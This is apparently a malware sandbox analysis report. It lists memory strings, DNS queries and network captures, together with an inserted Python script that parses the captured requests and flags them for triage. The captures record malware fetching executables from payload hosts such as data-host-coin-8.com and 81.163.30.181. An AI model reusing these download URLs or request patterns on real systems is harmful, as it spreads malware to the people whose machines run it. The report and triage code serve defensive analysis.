Source: svchost.exe, 00000008.00000002.534310561.0000024008A3E000.00000004.00000001.sdmp | String found in binary or memory: https://activity.windows.com
Source: svchost.exe, 00000008.00000002.534310561.0000024008A3E000.00000004.00000001.sdmp | String found in binary or memory: https://activity.windows.comr
Source: 8058.exe, 0000001F.00000002.423233100.0000000004011000.00000004.00000001.sdmp | String found in binary or memory: https://api.ip.sb/ip
Source: svchost.exe, 0000000A.00000003.305202115.0000024F15C61000.00000004.00000001.sdmp | String found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
Source: svchost.exe, 00000008.00000002.534310561.0000024008A3E000.00000004.00000001.sdmp | String found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 00000008.00000002.534310561.0000024008A3E000.00000004.00000001.sdmp | String found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 0000000A.00000003.305266972.0000024F15C5A000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
Source: svchost.exe, 0000000A.00000002.306281153.0000024F15C5C000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.305266972.0000024F15C5A000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 0000000A.00000003.305202115.0000024F15C61000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
Source: svchost.exe, 0000000A.00000002.306220372.0000024F15C3D000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
Source: svchost.exe, 0000000A.00000002.306281153.0000024F15C5C000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.305266972.0000024F15C5A000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Traffic/Incidents/
Source: svchost.exe, 0000000A.00000003.305055330.0000024F15C68000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.306331852.0000024F15C6A000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Transit/Stops/
Source: svchost.exe, 0000000A.00000003.305202115.0000024F15C61000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
Source: svchost.exe, 0000000A.00000003.305093646.0000024F15C49000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.306261450.0000024F15C4E000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: svchost.exe, 0000000A.00000002.306281153.0000024F15C5C000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.305266972.0000024F15C5A000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 0000000A.00000003.305202115.0000024F15C61000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
Source: svchost.exe, 0000000A.00000002.306220372.0000024F15C3D000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
Source: svchost.exe, 0000000A.00000003.305202115.0000024F15C61000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
Source: svchost.exe, 0000000A.00000003.305202115.0000024F15C61000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
Source: svchost.exe, 0000000A.00000003.305202115.0000024F15C61000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
Source: svchost.exe, 0000000A.00000003.305414851.0000024F15C41000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.306242274.0000024F15C42000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.305350891.0000024F15C40000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
Source: svchost.exe, 0000000A.00000003.305414851.0000024F15C41000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.306242274.0000024F15C42000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.305350891.0000024F15C40000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
Source: svchost.exe, 0000000A.00000003.305202115.0000024F15C61000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
Source: svchost.exe, 0000000A.00000002.306281153.0000024F15C5C000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.305266972.0000024F15C5A000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.305350891.0000024F15C40000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: svchost.exe, 0000000A.00000003.305266972.0000024F15C5A000.00000004.00000001.sdmp | String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
Source: svchost.exe, 0000000A.00000002.306281153.0000024F15C5C000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.305266972.0000024F15C5A000.00000004.00000001.sdmp | String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
Source: svchost.exe, 0000000A.00000002.306281153.0000024F15C5C000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.305266972.0000024F15C5A000.00000004.00000001.sdmp | String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
                      Source: svchost.exe, 0000000A.00000003.305350891.0000024F15C40000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t
                      Source: svchost.exe, 0000000A.00000003.305202115.0000024F15C61000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
                      Source: svchost.exe, 0000000A.00000002.306220372.0000024F15C3D000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
                      Source: svchost.exe, 0000000A.00000003.283252304.0000024F15C32000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
                      Source: svchost.exe, 0000000A.00000002.306220372.0000024F15C3D000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
                      Source: svchost.exe, 0000000A.00000002.306220372.0000024F15C3D000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.306093914.0000024F15C13000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
                      Source: svchost.exe, 0000000A.00000003.283252304.0000024F15C32000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
                      Source: svchost.exe, 0000000A.00000003.305386938.0000024F15C45000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.305350891.0000024F15C40000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
                      Source: svchost.exe, 0000000A.00000003.283252304.0000024F15C32000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
                      Source: svchost.exe, 0000000A.00000002.306201615.0000024F15C3B000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.283252304.0000024F15C32000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
                      Source: svchost.exe, 0000000A.00000003.305093646.0000024F15C49000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.306261450.0000024F15C4E000.00000004.00000001.sdmpString found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
Source: unknown | DNS traffic detected: queries for: host-data-coin-11.com
Source: C:\Users\user\AppData\Local\Temp\6BA5.exe | Code function: 28_2_00404BE0 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetSetOptionA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,InternetConnectA,InternetConnectA,HttpOpenRequestA,HttpOpenRequestA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,memcpy,lstrlen,memcpy,lstrlen,lstrlen,memcpy,lstrlen,HttpSendRequestA,HttpQueryInfoA,StrCmpCA,Sleep,InternetReadFile,lstrcat,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,
Source: global traffic | HTTP traffic detected: GET /files/9030_1641816409_7037.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: data-host-coin-8.com
Source: global traffic | HTTP traffic detected: GET /downloads/toolspab3.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: privacy-tools-for-you-780.com
Source: global traffic | HTTP traffic detected: GET /install5.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: unicupload.top
Source: global traffic | HTTP traffic detected: GET /game.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: data-host-coin-8.com
Source: global traffic | HTTP traffic detected: GET /6.php HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: 185.7.214.171:8080
Source: global traffic | HTTP traffic detected: GET /files/6961_1642089187_2359.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: data-host-coin-8.com
Source: global traffic | HTTP traffic detected: GET /l3.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: 81.163.30.181
Source: global traffic | HTTP traffic detected: GET /files/6961_1642089187_2359.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: data-host-coin-8.com
Source: global traffic | HTTP traffic detected: GET /files/7729_1642101604_1835.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: data-host-coin-8.com
Source: global traffic | HTTP traffic detected: GET /l2.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: 81.163.30.181
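The ten plaintext requests above all have the same three-header shape (Connection, User-Agent, Host), which is what a bare WinINet call chain like the one in the 6BA5.exe row produces when the caller adds nothing else; a browser that really sent that IE11 User-Agent would also send Accept, Accept-Language and Accept-Encoding. The following Python is an added triage example, not part of the sandbox report: it re-expands the captured request rows into raw HTTP/1.1 messages and applies a few heuristics that are the editor's own, not the report's (executable download, IP-literal host, non-default port, browser User-Agent without browser headers, and a `/files/<id>_<epoch>_<id>.exe` name pattern whose middle field is read as a Unix timestamp, which is an assumption about the naming scheme).

```python
"""Triage of the plaintext HTTP requests recorded in the report.

Added example, not part of the sandbox report. CAPTURED_REQUESTS are the
report's own rows rewritten in CRLF wire form; the rules are editor heuristics.
"""
import ipaddress
import re
from datetime import datetime, timezone

IE11_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko"


def _req(target: str, host: str) -> bytes:
    # Re-expands one report row into the bytes that were on the wire.
    return (f"GET {target} HTTP/1.1\r\nConnection: Keep-Alive\r\n"
            f"User-Agent: {IE11_UA}\r\nHost: {host}\r\n\r\n").encode("ascii")


CAPTURED_REQUESTS = [
    _req("/files/9030_1641816409_7037.exe", "data-host-coin-8.com"),
    _req("/downloads/toolspab3.exe", "privacy-tools-for-you-780.com"),
    _req("/install5.exe", "unicupload.top"),
    _req("/game.exe", "data-host-coin-8.com"),
    _req("/6.php", "185.7.214.171:8080"),
    _req("/files/6961_1642089187_2359.exe", "data-host-coin-8.com"),
    _req("/l3.exe", "81.163.30.181"),
    _req("/files/6961_1642089187_2359.exe", "data-host-coin-8.com"),
    _req("/files/7729_1642101604_1835.exe", "data-host-coin-8.com"),
    _req("/l2.exe", "81.163.30.181"),
]

# Headers a real browser sends alongside this User-Agent.
BROWSER_HEADERS = {"accept", "accept-language", "accept-encoding"}
# Editor's assumption: <id>_<unix epoch>_<id>.exe under /files/.
GENERATED_NAME = re.compile(r"^/files/\d+_(\d{10})_\d+\.exe$")


def parse_request(raw: bytes) -> dict:
    """Minimal HTTP/1.1 request-line and header parser (no body handling)."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("ascii")
    request_line, *header_lines = head.split("\r\n")
    method, target, version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "version": version, "headers": headers}


def split_host(host: str) -> tuple:
    """Return (hostname, port-or-None) for a Host header value."""
    name, sep, port = host.rpartition(":")
    if sep and port.isdigit():
        return name, int(port)
    return host, None


def is_ip_literal(name: str) -> bool:
    try:
        ipaddress.ip_address(name)
        return True
    except ValueError:
        return False


def assess(req: dict) -> list:
    """Apply the editor's heuristics to one parsed request; returns finding labels."""
    findings = []
    headers = req["headers"]
    name, port = split_host(headers.get("host", ""))
    if req["target"].lower().endswith(".exe"):
        findings.append("executable download")
    if is_ip_literal(name):
        findings.append("ip-literal host")
    if port not in (None, 80):
        findings.append(f"non-default port {port}")
    if headers.get("user-agent") == IE11_UA and BROWSER_HEADERS.isdisjoint(headers):
        findings.append("browser user-agent without browser headers")
    m = GENERATED_NAME.match(req["target"])
    if m:
        when = datetime.fromtimestamp(int(m.group(1)), tz=timezone.utc)
        findings.append(f"generated filename, embedded epoch {when:%Y-%m-%d}")
    return findings


def triage(raw_requests) -> list:
    """Parse and assess each raw request; one dict per request, in order."""
    rows = []
    for raw in raw_requests:
        req = parse_request(raw)
        rows.append({"url": f"http://{req['headers']['host']}{req['target']}",
                     "findings": assess(req)})
    return rows


if __name__ == "__main__":
    for row in triage(CAPTURED_REQUESTS):
        print(row["url"], "->", "; ".join(row["findings"]))
```

Every one of the ten requests trips the header-shape rule, which is the useful signal here: a single IE11 User-Agent string is easy for a loader to copy, the absence of the Accept family is a property of the API chain that produced the request rather than of the string.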
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown | Network traffic detected: HTTP traffic on port 49928 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49932 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49878 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49914 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49917
Source: unknown | Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49914
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49936
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49878
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49932
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49876
Source: unknown | Network traffic detected: HTTP traffic on port 49948 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49923 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49893
Source: unknown | Network traffic detected: HTTP traffic on port 49917 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49893 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49936 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49876 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49928
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49948
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49826
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49923
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 18:09:10 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Data Raw: 31 39 0d 0a 14 00 00 00 7b fa f6 1e b5 69 2b 2c 47 fa 0e a8 c1 82 9f 4f 1a c4 da 16 00 0d 0a 30 0d 0a 0d 0a | Data Ascii: 19{i+,GO0
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 18:09:11 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a | Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 18:09:11 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a | Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 18:09:11 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a | Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 18:09:12 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Data Raw: 32 64 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 13 49 3a 4a a6 e8 dd e6 f8 5f f5 4a 88 2d a0 57 53 98 00 e5 a7 2c f8 2f 0d 0a 30 0d 0a 0d 0a | Data Ascii: 2dI:82OI:J_J-WS,/0
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 18:09:13 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a | Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 18:09:14 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Data Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 47 ec aa 8c 70 bc 57 dd 43 de ff 21 81 22 e6 c3 95 50 28 e1 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a | Data Ascii: 46I:82OR&:UPJ%9GpWC!"P(c0
